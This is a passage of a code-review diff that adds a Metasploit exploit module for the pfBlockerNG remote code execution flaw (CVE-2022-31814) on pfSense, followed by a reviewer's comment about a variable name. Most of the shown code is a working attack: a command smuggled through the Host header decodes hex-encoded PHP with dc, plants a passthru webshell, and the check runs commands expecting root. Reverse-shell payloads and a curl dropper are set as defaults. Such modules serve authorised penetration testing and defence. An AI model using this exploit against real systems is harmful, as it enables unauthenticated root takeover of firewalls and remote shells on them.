modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb

```diff
@@ -0,0 +1,141 @@
+        },
+        'Author' => [
+          'IHTeam', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'CVE', '2022-31814' ],
+          [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'unix',
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_openssl'
+              },
+              'Payload' => {
+                'Append' => ' & disown'
+              }
+            }
+          ],
+          [
+            'BSD Dropper',
+            {
+              'Platform' => 'bsd',
+              'Arch' => [ARCH_X64],
+              'Type' => :bsd_dropper,
+              'CmdStagerFlavor' => [ 'curl' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DisclosureDate' => '2022-09-05',
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('WEBSHELL_NAME', [
+          false, 'The name of the uploaded webshell. This value is randomly set with a specific length if unset.', nil
+        ])
+      ]
+    )
+  end
+
+  def upload_shell
+    print_status 'Uploading shell...'
+    @webshell_name = datastore['WEBSHELL_NAME'] || "#{Rex::Text.rand_text_alpha(8..16)}.php"
+    print_status("Webshell name is: #{@webshell_name}")
+    web_shell_contents = <<~EOF
+      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["c"]));');
+    EOF
+    encoded_php = web_shell_contents.unpack('H*')[0].upcase
+    send_request_raw(
+      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),
+      'headers' => {
+        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"
+      }
+    )
+    sleep datastore['WfsDelay']
+  end
+
+  def check
+    upload_shell
+    check_for_shell = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),
+      'vars_post' => {
+        'c' => 'id'
+      }
+    )
+    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_for_shell.nil? || check_for_shell.body.nil? || !check_for_shell.body.include?('uid=0(root) gid=0(wheel)')
```

Comment:
`check_for_shell` is a poor variable name for what it holds here and tells me nothing about the data type or its contents. Should probably update this.